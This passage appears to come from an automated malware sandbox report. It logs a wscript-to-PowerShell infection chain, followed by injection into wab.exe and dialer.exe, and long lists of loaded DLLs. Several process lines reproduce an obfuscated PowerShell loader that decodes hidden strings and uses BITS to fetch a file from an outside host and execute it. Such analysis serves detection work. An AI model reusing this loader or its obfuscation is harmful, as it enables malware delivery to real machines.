TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Tak
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Tak
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 TakJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 TakJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
